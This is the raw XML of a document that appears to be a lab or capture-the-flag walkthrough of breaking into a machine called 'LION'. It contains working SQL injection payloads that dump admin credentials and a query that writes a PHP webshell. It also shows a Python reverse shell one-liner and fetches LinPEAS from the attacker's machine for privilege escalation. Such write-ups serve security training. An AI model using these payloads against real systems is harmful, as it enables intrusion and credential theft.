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2"/>
      <w:bookmarkEnd w:id="2"/>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w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> LION</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine.If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9v1iddfv9t6b" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>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xs0373wo398b" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>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222500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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m6oh3ew5yj5" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>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kq245xix29h5" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>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pq4mjhd4r4n" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>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up2seejljgm" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>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10">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13">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3306 – MYSQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">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329mcqmnp70q" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf Scan:</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from that wordlist, then checks the HTTP status code. (If you are using Kali or ParrotOS, you can find these wordlists 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5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the administration page →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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, but we do not have the password.</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Unfortunately, the login field is not vulnerable to SQLi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2971800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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search.php</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5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 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Search</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> field. I will type the word </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"teste"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> into this field.</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submitting "teste" in the field, it returns the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05100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="73"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k3bjmuhimq71" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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 next step is to try injecting some </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLi </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">commands to verify whether this parameter is vulnerable to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injection.</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need to identify the number of columns in the table.</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1,2,3,4,5,6#</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6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did not return anything, so let’s increase the number of columns.</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1,2,3,4,5,6,7#</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54300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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Alright, apparently we have </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7 columns</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and the number </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was reflected. We will use column 2 to retrieve database information. I will use the following command to see the database version:</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1,@@version,3,4,5,6,7#</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1100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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query result is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5.5.68-MariaDB, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now I will retrieve the database name:</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1,database(),3,4,5,6,7#</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6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the database name. Now I will retrieve the table names from this database.</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1,table_name,3,4,5,6,7 from information_schema.tables where table_schema = 'news'#</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94100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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tbladmin</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tblcategory</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tblcomments</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tblpages</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tblposts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">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tblsubcategory</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now have the names of the 6 tables. The most important table for us is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"tbladmin"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so we will list its columns.</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1,column_name,3,4,5,6,7 from information_schema.columns where table_name = 'tbladmin'#</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92500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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4"/>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id</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AdminUserName</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AdminPassword</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AdminEmailid</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Is_Active</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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CreationDate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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UpdationDate</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I will retrieve the values from these columns. We will use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">concat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which allows us to combine two or more expressions together.</w:t>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 union select 1,concat(AdminUserName,":",AdminPassword),3,4,5,6,7 from tbladmin#</w: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s8a08ii97i6t" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>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336800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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Bcrypt </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">provides greater security than other cryptographic algorithms because it contains a variable that is proportional to the amount of processing required to encrypt the desired information, making it resistant to brute-force attacks. Therefore, it will not be possible to crack this </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hash </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since we have </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can attempt to write a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">webshell into a directory where we have write permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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Payload:</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system($_GET['cmd']) ?&gt;</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testing some directories such as:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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/var/www/html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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/var/www/html/images</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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/var/www/html/vendor</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was able to write to the directory </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html/includes</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd.php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containing the payload. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command used to write the file:</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'union select 1,"&lt;?php system($_GET['cmd']) ?&gt;",3,4,5,6,7 into outfile "/var/www/html/includes/cmd.php"#</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we access </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/includes</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can see that our file was successfully written =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">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92djf82nj9kz" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>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400300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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execute commands on the system, we will access </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/includes/cmd.php?cmd=&lt;command&gt;. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here I will use the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http://$site/includes/cmd.php?cmd=id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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4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20193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Alright, we have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on the server. The next step will be to obtain a reverse shell. To do this, we will use the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">whereis python</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http://$site/includes/cmd.php?cmd=whereis python</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Python2 installed on the server, so we will use a Python2 reverse shell:</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socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("&lt;IP&gt;",&lt;PORT&gt;));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'</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7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http://$site/includes/cmd.php?cmd=python -c 'import</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("&lt;IP&gt;",&lt;PORT&gt;));os.dup2(s.fileno(),0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F">
      <w:pPr>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os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'</w:t>
      </w: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connection 😀</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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72"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jrnk10mgccrp" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>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iajhtsfh8316" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TTY Shell</w:t>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7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directory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find our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">second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6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wrt2jpig03qg" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>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7uai9jdvl90p" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege Escalation (Privesc)</w:t>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LinPEAS </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is a script that searches for possible paths to escalate privileges on Linux / Unix* / MacOS hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000070">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Checks are explained in: </w:t>
      </w:r>
      <w:hyperlink r:id="rId27">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://book.hacktricks.xyz/linux-unix/privilege-escalation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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Downloading </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LinPEAS on our machine:</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https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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6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start a Python server on our machine so we can send </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LinPEAS </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to the compromised server.</w:t>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58"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compromised server, we run:</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/tmp</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http://&lt;IP-VPN&gt;/linpeas.sh</w:t>
      </w:r>
    </w:p>
